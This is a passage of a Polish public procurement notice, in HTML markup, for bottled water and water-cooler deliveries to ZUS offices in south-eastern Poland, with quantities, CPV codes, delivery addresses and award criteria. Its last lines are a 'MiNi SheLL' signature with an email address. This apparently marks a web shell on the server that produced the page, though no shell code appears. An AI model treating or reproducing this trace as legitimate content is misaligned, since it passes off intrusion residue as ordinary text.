1. Woda mineralna średniozmineralizowana gazowana w butelkach PET o poj. 1,5 l - 12300 szt.;
2. Woda mineralna średniozmineralizowana  niegazowana w butelkach PET o poj. 1,5 l - 16000 szt.;
3. Woda mineralna średniozmineralizowana gazowana w butelkach PET o poj. 0,5 l - 2700 szt.;
4. Woda mineralna średniozmineralizowana  niegazowana w butelkach PET o poj. 0,5 l - 2300 szt.;
Woda ma być dostarczana do następujących jednostek: a) Oddział ZUS w Lublinie  przy ul. Zana 36,38c;  
b) Inspektorat ZUS w Radzyniu Podlaskim, ul. Armii Krajowej 22/32..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.10.00-8, 41.11.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 96</li>
<li>2. Termin dostawy - 4</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawy wody w butelkach dla pracowników w ramach BHP i na potrzeby ogólne do Oddziału ZUS w Rzeszowie oraz podległych jednostek terenowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna w zależności od potrzeb dostawa wody w następujących asortymentach i parametrach:
1. Woda mineralna lub źródlana gazowana w butelkach szklanych o poj. 0,33l - 120000 szt.;
Woda ma być dostarczana do następujących jednostek:
a)Oddział ZUS w Rzeszowie, Al. Piłsudskiego 12; 
b)Inspektorat ZUS w Mielcu, ul. Sikorskiego 4; 
c)Inspektorat ZUS w Stalowej Woli, ul. Popiełuszki 8; 
d)Inspektorat ZUS w Tarnobrzegu, ul. Sienkiewicza 145D; 
e)Inspektorat ZUS w Leżajsku, ul. Mickiewicza 24;
f)Inspektorat ZUS w Przeworsku, ul. Dworcowa 1; 
g)Inspektorat ZUS w Jarosławiu, ul. Słowackiego 21; 
h)Inspektorat ZUS w Przemyślu, ul. Brodzińskiego 6;
i)Biuro Terenowe w Lubaczowie, ul. Mickiewicza 169.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.10.00-8, 41.11.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 96</li>
<li>2. Termin dostawy - 4</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawy wody w  butlach do dystrybutorów dla klientów  do Oddziału ZUS w Biłgoraju oraz podległych jednostek terenowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna w zależności od potrzeb dostawa wody naturalnej źródlanej lub mineralnej w butlach o poj. 18,9-19,0 l wraz z nieodpłatnym udostępnieniem dystrybutorów do wody (9 szt.) oraz nieodpłatnym zapewnieniem kubków  jednorazowych o poj. 200 ml w ilości 100 szt. na każdą butlę. Szacunkowa ilość butli - 504 szt.
Woda ma być dostarczana do następujących jednostek Zamawiajacego: 
a) Oddział ZUS w Biłgoraju przy ul. Kościuszki 103; 
b) Oddział ZUS w Biłgoraju przy ul. Krzeszowskiej 62a;
c) Inspektorat ZUS w Chełmie przy ul. I Armii Wojska Polskiego 8; 
d) Inspektorat ZUS w Tomaszowie Lub. przy ul. Jana Pawła II 6;
e) Inspektorat ZUS w Zamościu przy ul. Kiepury 2;
f) Inspektorat ZUS w Hrubieszowie ul. 3-go Maja 8a; 
g) Biuro Terenowe ZUS w Janowie Lubelskim, ul. Zamoyskiego 52;
h) Biuro Terenowe ZUS w Krasnymstawie ul. PCK 13;
i) Biuro Terenowe ZUS we Włodawie ul. Reymonta 12.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.10.00-8, 41.11.00.00-3, 39.22.21.20-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 96</li>
<li>2. Termin dostawy - 4</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawy wody w butlach do dystrybutorów dla klientów do Oddziału ZUS w Kielcach oraz podległych jednostek terenowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna w zależności od potrzeb dostawa wody naturalnej źródlanej lub mineralnej w butlach o poj. 18,9-19,0 l wraz z nieodpłatnym udostępnieniem dystrybutorów do wody (23 szt.) oraz nieodpłatnym zapewnieniem kubków  jednorazowych o poj. 200 ml w ilości 100 szt. na każdą butlę. Szacunkowa ilość butli - 1672 szt.
Woda ma być dostarczana do następujących jednostek: 
a)Busko Zdrój ul. Partyzantów 33;
b)Końskie ul. Partyzantów 50/52;
c)Opatów ul. Sempołowskiej 12;
d)Ostrowiec Św. ul. Rosłańskiego 4;
e)Pińczów ul. 3-go Maja 40;
f) Sandomierz ul. Mickiewicza 53a;
g)Skarżysko Kamienna ul. Kossaka 3;
h)Starachowice ul. Radomska 31a;
i)Jędrzejów ul. Kościelna 10;
j)Staszów ul. Długa 10;
k)Włoszczowa ul. Sienkiewicza 12;
l)Kielce ul. Piotrkowska 27;
ł)Kielce ul. Kolberga 2A.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.10.00-8, 41.11.00.00-3, 39.22.21.20-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 96</li>
<li>2. Termin dostawy - 4</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawy wody w butlach do dystrybutorów dla klientów do Oddziału ZUS w Lublinie oraz podległych jednostek terenowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna w zależności od potrzeb dostawa wody naturalnej źródlanej lub mineralnej w butlach o poj. 18,9-19,0 l wraz z nieodpłatnym udostępnieniem dystrybutorów do wody (10 szt.) oraz nieodpłatnym zapewnieniem kubków  jednorazowych o poj. 200 ml w ilości 100 szt. na każdą butlę. Szacunkowa ilość butli - 472 szt.
Woda ma być dostarczana do następujących jednostek: 
a)Oddział ZUS w Lublinie ul. T. Zana 36,38c, 20-601 Lublin;
b)Inspektorat w Kraśniku, ul. Ks. J. Popiełuszki 3A , 23-210 Kraśnik;
c)Inspektorat  w Puławach ul. Lubelska 20B , 24-100 Puławy;
d)Inspektorat w Radzyniu Podl., ul. Armii Krajowej 22/32, 21-300 Radzyń Podl.;
e)Inspektorat w Białej Podlaskiej, ul. Sadowa 23, 21-500 Biała Podlaska;     
f)Inspektorat w Łukowie ul. Kard. Wyszyńskiego 56, 21-400 Łuków;
g)Inspektorat w Lubartowie ul. Lipowa 6, 21-100 Lubartów;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.10.00-8, 41.11.00.00-3, 39.22.21.20-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 96</li>
<li>2. Termin dostawy - 4</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawy wody w butlach do dystrybutorów dla klientów do Oddziału ZUS w Rzeszowie oraz podległych jednostek terenowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna w zależności od potrzeb dostawa wody naturalnej źródlanej lub mineralnej w butlach o poj. 18,9-19,0 l wraz z nieodpłatnym udostępnieniem dystrybutorów do wody (12 szt.) oraz nieodpłatnym zapewnieniem kubków  jednorazowych o poj. 200 ml w ilości 100 szt. na każdą butlę. Szacunkowa ilość butli - 1450 szt.
Woda ma być dostarczana do następujących jednostek: 
a)Oddział ZUS w Rzeszowie Al. Piłsudskiego 12;
b)Inspektorat ZUS w Mielcu ul. Sikorskiego 4;
c)Inspektorat ZUS w Stalowej Woli ul. Popiełuszki 8;
d)Inspektorat ZUS w Tarnobrzegu ul. Sienkiewicza 145D;
e)Inspektorat ZUS w Leżajsku  ul. Mickiewicza 24;
f)Inspektorat ZUS w Przeworsku ul. Dworcowa 1;
g)Inspektorat ZUS w Jarosławiu ul. Słowackiego 21;
h)Inspektorat ZUS w Przemyślu ul. Brodzińskiego 6;
i)Biuro Terenowe w Lubaczowie ul. Mickiewicza 169.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.10.00-8, 41.11.00.00-3, 39.22.21.20-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 96</li>
<li>2. Termin dostawy - 4</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com